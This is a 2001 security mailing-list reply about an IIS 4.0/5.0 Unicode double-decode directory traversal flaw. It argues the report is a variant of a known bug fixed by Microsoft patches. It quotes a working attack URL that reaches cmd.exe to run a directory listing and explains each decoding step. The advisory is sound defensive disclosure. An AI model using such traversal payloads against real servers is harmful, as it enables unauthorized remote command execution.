Re: New vulnerability in IIS4.0/5.0

From: Dave Ahmad (daat_private)
Date: Wed Sep 19 2001 - 12:50:02 PDT

    This seems to be just be another way to exploit the double decode
    vulnerability (Bugtraq ID 2708).  There is a possibility that it may be a
    new issue due to the use of '%u' method of encoding.  It does not look
    that way to us.

    On our test machines (and at eEye), systems do not seem to be vulnerable
    after applying the MS01-026 hotfix (or the MS01-044 patch).

    Ryan Permeh of eEye Digital Security provided a breakdown of an encoded
    attack string:

    The attack string used successfully against an IIS server (Win2K, SP2):

    http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c
    +dir+c:\

    first decode sequence(it replaces %u0025 with %)
    http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

    second decode sequence (it replaces %u005c with /)
    http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\

    The double decode vulnerability is fixed in MS01-026.   I believe the fix
    is included in the cumulative patch released with MS01-044.

    It doesn't look like a new vulnerability, but we are awaiting confirmation
    from Microsoft.

    Has anyone managed to exploit a patched system?

    Thanks Ryan & eEye.

    Regards,

    Dave Ahmad
    Security Focus